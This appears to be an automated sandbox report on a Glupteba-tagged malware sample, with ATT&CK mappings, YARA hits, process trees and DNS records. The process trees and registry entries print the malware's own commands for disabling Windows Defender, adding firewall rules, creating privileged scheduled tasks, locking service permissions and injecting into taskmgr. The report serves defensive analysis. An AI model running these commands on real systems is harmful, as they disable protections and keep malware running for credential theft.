glupteba | 07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	6WE7LW9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	6WE7LW9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	6WE7LW9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	6WE7LW9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	6WE7LW9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	6WE7LW9.exe

Mystic
Mystic is an infostealer written in C++.
stealer mystic
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

resource	yara_rule
behavioral1/memory/528-28-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/files/0x000a000000022d33-114.dat	family_redline
behavioral1/files/0x000a000000022d33-118.dat	family_redline
behavioral1/memory/1748-120-0x0000000000470000-0x000000000048E000-memory.dmp	family_redline
behavioral1/files/0x000b000000022e19-406.dat	family_redline
behavioral1/files/0x000b000000022e19-405.dat	family_redline
behavioral1/memory/4900-463-0x0000000000540000-0x000000000059A000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000a000000022d33-114.dat	family_sectoprat
behavioral1/files/0x000a000000022d33-118.dat	family_sectoprat
behavioral1/memory/1748-120-0x0000000000470000-0x000000000048E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
3432	netsh.exe

.NET Reactor proctector 21 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/4488-68-0x0000000002300000-0x0000000002320000-memory.dmp	net_reactor
behavioral1/memory/4488-73-0x0000000004990000-0x00000000049AE000-memory.dmp	net_reactor
behavioral1/memory/4488-71-0x0000000004A20000-0x0000000004A30000-memory.dmp	net_reactor
behavioral1/memory/4488-74-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-75-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-77-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-79-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-81-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-83-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-85-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-87-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-89-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-91-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-93-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-95-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-97-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-99-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-101-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-103-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/4488-105-0x0000000004990000-0x00000000049A9000-memory.dmp	net_reactor
behavioral1/memory/3836-518-0x0000000005580000-0x00000000055FD000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	A40B.exe

Executes dropped EXE 15 IoCs

pid	Process
5056	TI5rq18.exe
4992	BH2zN47.exe
4076	ka9Jt40.exe
4056	2BI0100.exe
1008	3CA71oJ.exe
220	4Qk377kr.exe
2228	5Eo8xy0.exe
4488	6WE7LW9.exe
636	A40B.exe
1748	A610.exe
1816	InstallSetup5.exe
4372	toolspub2.exe
376	Broom.exe
1604	31839b57a4f11171d6abc8bbc4451ee4.exe
3944	toolspub2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000022e82-3629.dat	upx

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	6WE7LW9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	6WE7LW9.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	ka9Jt40.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	TI5rq18.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	BH2zN47.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4056 set thread context of 528	4056	2BI0100.exe	106
PID 1008 set thread context of 696	1008	3CA71oJ.exe	111
PID 220 set thread context of 4496	220	4Qk377kr.exe	124
PID 4372 set thread context of 3944	4372	toolspub2.exe	135

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3128	sc.exe
3968	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1080	696	WerFault.exe	111
2592	4900	WerFault.exe	148

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5Eo8xy0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5Eo8xy0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5Eo8xy0.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
216	schtasks.exe
2136	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2228	5Eo8xy0.exe
2228	5Eo8xy0.exe
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
3324	Process not Found
4488	6WE7LW9.exe
4488	6WE7LW9.exe
3324	Process not Found
3324	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2228	5Eo8xy0.exe
3944	toolspub2.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	4488	6WE7LW9.exe
Token: SeShutdownPrivilege	3324	Process not Found
Token: SeCreatePagefilePrivilege	3324	Process not Found
Token: SeShutdownPrivilege	3324	Process not Found
Token: SeCreatePagefilePrivilege	3324	Process not Found
Token: SeShutdownPrivilege	3324	Process not Found
Token: SeCreatePagefilePrivilege	3324	Process not Found
Token: SeDebugPrivilege	1748	A610.exe
Token: SeShutdownPrivilege	3324	Process not Found
Token: SeCreatePagefilePrivilege	3324	Process not Found
Token: SeShutdownPrivilege	3324	Process not Found
Token: SeCreatePagefilePrivilege	3324	Process not Found
Token: SeShutdownPrivilege	3324	Process not Found
Token: SeCreatePagefilePrivilege	3324	Process not Found
Token: SeDebugPrivilege	3812	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
376	Broom.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3468 wrote to memory of 5056	3468	07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d.exe	89
PID 3468 wrote to memory of 5056	3468	07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d.exe	89
PID 3468 wrote to memory of 5056	3468	07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d.exe	89
PID 5056 wrote to memory of 4992	5056	TI5rq18.exe	91
PID 5056 wrote to memory of 4992	5056	TI5rq18.exe	91
PID 5056 wrote to memory of 4992	5056	TI5rq18.exe	91
PID 4992 wrote to memory of 4076	4992	BH2zN47.exe	92
PID 4992 wrote to memory of 4076	4992	BH2zN47.exe	92
PID 4992 wrote to memory of 4076	4992	BH2zN47.exe	92
PID 4076 wrote to memory of 4056	4076	ka9Jt40.exe	93
PID 4076 wrote to memory of 4056	4076	ka9Jt40.exe	93
PID 4076 wrote to memory of 4056	4076	ka9Jt40.exe	93
PID 4056 wrote to memory of 4856	4056	2BI0100.exe	105
PID 4056 wrote to memory of 4856	4056	2BI0100.exe	105
PID 4056 wrote to memory of 4856	4056	2BI0100.exe	105
PID 4056 wrote to memory of 528	4056	2BI0100.exe	106
PID 4056 wrote to memory of 528	4056	2BI0100.exe	106
PID 4056 wrote to memory of 528	4056	2BI0100.exe	106
PID 4056 wrote to memory of 528	4056	2BI0100.exe	106
PID 4056 wrote to memory of 528	4056	2BI0100.exe	106
PID 4056 wrote to memory of 528	4056	2BI0100.exe	106
PID 4056 wrote to memory of 528	4056	2BI0100.exe	106
PID 4056 wrote to memory of 528	4056	2BI0100.exe	106
PID 4076 wrote to memory of 1008	4076	ka9Jt40.exe	107
PID 4076 wrote to memory of 1008	4076	ka9Jt40.exe	107
PID 4076 wrote to memory of 1008	4076	ka9Jt40.exe	107
PID 1008 wrote to memory of 2152	1008	3CA71oJ.exe	109
PID 1008 wrote to memory of 2152	1008	3CA71oJ.exe	109
PID 1008 wrote to memory of 2152	1008	3CA71oJ.exe	109
PID 1008 wrote to memory of 3372	1008	3CA71oJ.exe	110
PID 1008 wrote to memory of 3372	1008	3CA71oJ.exe	110
PID 1008 wrote to memory of 3372	1008	3CA71oJ.exe	110
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 1008 wrote to memory of 696	1008	3CA71oJ.exe	111
PID 4992 wrote to memory of 220	4992	BH2zN47.exe	112
PID 4992 wrote to memory of 220	4992	BH2zN47.exe	112
PID 4992 wrote to memory of 220	4992	BH2zN47.exe	112
PID 220 wrote to memory of 4496	220	4Qk377kr.exe	124
PID 220 wrote to memory of 4496	220	4Qk377kr.exe	124
PID 220 wrote to memory of 4496	220	4Qk377kr.exe	124
PID 220 wrote to memory of 4496	220	4Qk377kr.exe	124
PID 220 wrote to memory of 4496	220	4Qk377kr.exe	124
PID 220 wrote to memory of 4496	220	4Qk377kr.exe	124
PID 220 wrote to memory of 4496	220	4Qk377kr.exe	124
PID 220 wrote to memory of 4496	220	4Qk377kr.exe	124
PID 220 wrote to memory of 4496	220	4Qk377kr.exe	124
PID 5056 wrote to memory of 2228	5056	TI5rq18.exe	125
PID 5056 wrote to memory of 2228	5056	TI5rq18.exe	125
PID 5056 wrote to memory of 2228	5056	TI5rq18.exe	125
PID 3468 wrote to memory of 4488	3468	07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d.exe	126
PID 3468 wrote to memory of 4488	3468	07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d.exe	126
PID 3468 wrote to memory of 4488	3468	07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d.exe	126
PID 3324 wrote to memory of 636	3324	Process not Found	127
PID 3324 wrote to memory of 636	3324	Process not Found	127
PID 3324 wrote to memory of 636	3324	Process not Found	127
PID 3324 wrote to memory of 1748	3324	Process not Found	128

C:\Users\Admin\AppData\Local\Temp\07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d.exe
"C:\Users\Admin\AppData\Local\Temp\07b7df37915fcfbe39a7fbd3a21822233e69bcccf33703df3b3c4ba31ae17d5d.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3468
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TI5rq18.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TI5rq18.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:5056
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\BH2zN47.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\BH2zN47.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ka9Jt40.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ka9Jt40.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4076
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2BI0100.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2BI0100.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4056
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:4856
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:528
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3CA71oJ.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3CA71oJ.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1008
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:2152
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:3372
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:696
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 540
        7⤵
        Program crash
        
        PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Qk377kr.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Qk377kr.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:220
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:4496
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Eo8xy0.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Eo8xy0.exe
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:2228
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6WE7LW9.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6WE7LW9.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 696 -ip 696
1⤵
PID:1972

C:\Users\Admin\AppData\Local\Temp\A40B.exe
C:\Users\Admin\AppData\Local\Temp\A40B.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:636
- C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
  "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
  2⤵
  - Executes dropped EXE
  PID:1816
- - C:\Users\Admin\AppData\Local\Temp\Broom.exe
    C:\Users\Admin\AppData\Local\Temp\Broom.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:376
- C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4372
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:3944
- C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  - Executes dropped EXE
  PID:1604
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3812
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    PID:2876
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:3000
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:3432
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:3904
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2692
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      PID:2916
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3780
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:216
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:1348
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4704
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4720
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:2240
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:2136
    - - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        5⤵
        
        PID:2200
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        
        PID:232
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        Launches sc.exe
        
        PID:3128
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        
        PID:464
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Launches sc.exe
        
        PID:3968

C:\Users\Admin\AppData\Local\Temp\A610.exe
C:\Users\Admin\AppData\Local\Temp\A610.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Users\Admin\AppData\Local\Temp\EAAB.exe
C:\Users\Admin\AppData\Local\Temp\EAAB.exe
1⤵
PID:2800
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  2⤵
  PID:4132

C:\Users\Admin\AppData\Local\Temp\ED9A.exe
C:\Users\Admin\AppData\Local\Temp\ED9A.exe
1⤵
PID:1412

C:\Users\Admin\AppData\Local\Temp\97.exe
C:\Users\Admin\AppData\Local\Temp\97.exe
1⤵
PID:5092
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  2⤵
  PID:4968

C:\Users\Admin\AppData\Local\Temp\2CA.exe
C:\Users\Admin\AppData\Local\Temp\2CA.exe
1⤵
PID:4900
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 784
  2⤵
  - Program crash
  PID:2592

C:\Users\Admin\AppData\Local\Temp\57B.exe
C:\Users\Admin\AppData\Local\Temp\57B.exe
1⤵
PID:3836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4900 -ip 4900
1⤵
PID:2216

C:\Users\Admin\AppData\Local\Temp\54A5.exe
C:\Users\Admin\AppData\Local\Temp\54A5.exe
1⤵
PID:2532
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  2⤵
  PID:3792

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
1⤵
PID:2300

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:2864

Network

DNS

73.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.159.190.20.in-addr.arpa

IN PTR

Response
DNS

158.240.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.240.127.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

39.142.81.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

39.142.81.104.in-addr.arpa

IN PTR

Response

39.142.81.104.in-addr.arpa

IN PTR

a104-81-142-39deploystaticakamaitechnologiescom
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

1.202.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.202.248.87.in-addr.arpa

IN PTR

Response

1.202.248.87.in-addr.arpa

IN PTR

https-87-248-202-1amsllnwnet
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

